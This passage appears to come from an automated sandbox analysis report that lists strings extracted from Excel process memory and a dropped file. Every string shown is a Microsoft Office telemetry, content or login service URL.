    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.netKD
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.coma
    Source: EXCEL.EXE, 00000000.00000003.884372546.000000001272E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891634618.000000001272F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?MBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.885584011.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892185265.0000000012957000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285031885.0000000012957000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: EXCEL.EXE, 00000000.00000002.891872749.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885251853.0000000012805000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3dMBI_SSL_SHORTofficeapps.live.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=16da
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1A
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000000.00000002.890687010.000000000EFB6000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnostics.office.coma
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comW
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885712225.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892258476.000000001299A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887073698.0000000012999000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886458219.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886938116.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoreAddInsInClient
    Source: EXCEL.EXE, 00000000.00000002.891872749.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885251853.0000000012805000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.886777614.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892135449.0000000012920000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.285010208.0000000012920000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: EXCEL.EXE, 00000000.00000003.284941605.00000000128BF000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
    Source: EXCEL.EXE, 00000000.00000002.893311531.000000001536A000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/RU
    Source: EXCEL.EXE, 00000000.00000003.884722531.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884962144.00000000129CE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892295205.00000000129D1000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/auth
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeR
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorizeW
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://login.windows.local
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.885275014.0000000012821000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891911589.0000000012821000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oaut
    Source: 40484C98-D3A3-480D-91A7-412F4910F605.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018
    Source: EXCEL.EXE, 00000000.00000002.891599493.00000000126FA000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018Xi$
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize9
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeA
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize_
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
    Source: EXCEL.EXE, 00000000.00000003.285059746.0000000012988000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884785145.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.884975520.00000000129DB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.892309496.00000000129DB000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
    Source: EXCEL.EXE, 00000000.00000003.884392576.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885121120.000000001274F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.891675623.000000001274F000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeg
